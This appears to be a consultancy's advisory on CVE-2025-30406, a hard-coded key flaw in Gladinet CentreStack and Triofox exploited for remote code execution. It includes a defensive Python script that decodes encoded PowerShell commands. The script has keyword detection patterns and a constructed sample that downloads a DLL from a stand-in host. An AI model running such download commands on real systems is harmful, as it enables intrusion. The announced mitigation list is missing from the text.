A critical security vulnerability has been identified in Gladinet CentreStack and its Triofox remote access solution, tracked as CVE-2025-30406 with a CVSS score of 9.0. This flaw involves the use of a hard-coded cryptographic key, which could allow attackers to execute remote code on internet-accessible servers. The vulnerability has already been exploited as a zero-day, affecting at least seven organizations. It is crucial for users to update to CentreStack version 16.4.10315.56368 or later to mitigate this risk.
The vulnerability was first exploited in March 2025, with the earliest known compromise occurring on April 11, 2025. Attackers have been using this flaw to download and sideload malicious DLLs via encoded PowerShell scripts, a technique similar to recent attacks on CrushFTP. This has enabled them to move laterally within networks and install MeshCentral for persistent remote access.
Telemetry data indicates that the CentreStack software is installed on approximately 120 endpoints, with seven unique organizations confirmed as compromised. The attackers have been observed using Impacket PowerShell commands for network enumeration and deploying MeshAgent, although the full scope and objectives of these campaigns remain unclear.
The primary threat involves a hard-coded cryptographic key in Gladinet CentreStack and Triofox, which can be exploited for remote code execution. This vulnerability, CVE-2025-30406, poses a significant risk due to its high CVSS score of 9.0. Attackers can leverage this flaw to gain unauthorized access to systems, potentially leading to data breaches or further network infiltration.
Exploitation of this vulnerability has been observed in the wild, with attackers using encoded PowerShell scripts to sideload DLLs and establish remote access through MeshCentral. This method allows for stealthy lateral movement within affected networks, increasing the potential impact on compromised organizations.
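For defenders hunting for the behaviour described above, the following added example (not part of the original advisory and not vendor code) decodes PowerShell `-EncodedCommand` arguments from process command lines and flags decoded scripts that reference DLLs, downloads or MeshAgent/MeshCentral. The indicator keywords, function names and sample command lines are assumptions constructed for illustration.

```python
import base64
import binascii
import re

# Any "-flag value" pair whose value looks like a base64 blob.
ARG = re.compile(r"\s[-/]([A-Za-z]+)\s+([A-Za-z0-9+/=]{16,})")

# Assumed keyword list, derived from the behaviours this advisory names.
INDICATORS = {
    "dll_reference": re.compile(r"\.dll\b", re.I),
    "download": re.compile(r"invoke-webrequest|downloadfile|start-bitstransfer", re.I),
    "mesh_remote_access": re.compile(r"mesh(agent|central)", re.I),
}

def is_encoded_flag(flag):
    # PowerShell accepts -EncodedCommand, any prefix of it (-e, -enc, ...) and -ec.
    flag = flag.lower()
    return flag == "ec" or "encodedcommand".startswith(flag)

def decode_blob(blob):
    # -EncodedCommand carries base64 of UTF-16LE text.
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None

def triage(cmdline):
    """Return decoded script and indicator hits, or None if nothing was decoded."""
    for m in ARG.finditer(cmdline):
        if not is_encoded_flag(m.group(1)):
            continue
        text = decode_blob(m.group(2))
        if text is not None:
            hits = sorted(k for k, rx in INDICATORS.items() if rx.search(text))
            return {"decoded": text, "hits": hits}
    return None

def _enc(script):  # builds constructed sample input
    return base64.b64encode(script.encode("utf-16-le")).decode()

# Constructed process command lines (not taken from the incidents described).
SAMPLES = [
    "powershell.exe -NoP -W Hidden -enc " + _enc(
        "Invoke-WebRequest http://files.example.invalid/x.dll -OutFile C:\\Windows\\Temp\\x.dll"),
    "powershell.exe -e " + _enc("Start-Process C:\\ProgramData\\MeshAgent.exe"),
    "powershell.exe -EncodedCommand " + _enc("Get-Date"),
    "powershell.exe -File C:\\scripts\\backup.ps1",
]

if __name__ == "__main__":
    for line in SAMPLES:
        print(triage(line))
```

An encoded command with no indicator hits is still returned with its decoded text, so an analyst can review it rather than rely on the keyword list alone.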
Industries relying on remote access and collaboration tools are particularly at risk, as the vulnerability affects both CentreStack and Triofox solutions. Organizations using these products should prioritize updates to prevent potential exploitation and mitigate associated risks.
Clients using Gladinet CentreStack or Triofox may face operational disruptions due to unauthorized access and potential data breaches. The exploitation of this vulnerability could lead to significant financial losses, especially if sensitive data is compromised or systems are rendered inoperable.
Reputation damage is another concern, as clients may lose trust in organizations that fail to secure their systems against known vulnerabilities. Additionally, regulatory compliance issues could arise if data protection laws are violated due to unauthorized access or data breaches.
Compliance Implications: Organizations must ensure they adhere to relevant data protection regulations by promptly addressing this vulnerability. Failure to do so could result in audits, penalties, or legal action if client data is compromised.
To mitigate the risks associated with CVE-2025-30406, clients should take the following actions:
1898 & Co is actively addressing the current threat landscape by offering specialized services designed to mitigate emerging threats like CVE-2025-30406. Our team provides tailored security assessments and incident response services to help clients identify vulnerabilities and respond effectively to potential breaches.
We have updated our security protocols to incorporate the latest threat intelligence and best practices for protecting against remote code execution vulnerabilities. Our collaborative efforts with industry allies and government agencies ensure that we remain at the forefront of cybersecurity developments.
Ongoing research and threat intelligence gathering activities enable us to provide clients with timely insights into evolving threats. Our case studies demonstrate successful mitigations of similar vulnerabilities, showcasing our ability to support clients in enhancing their security measures.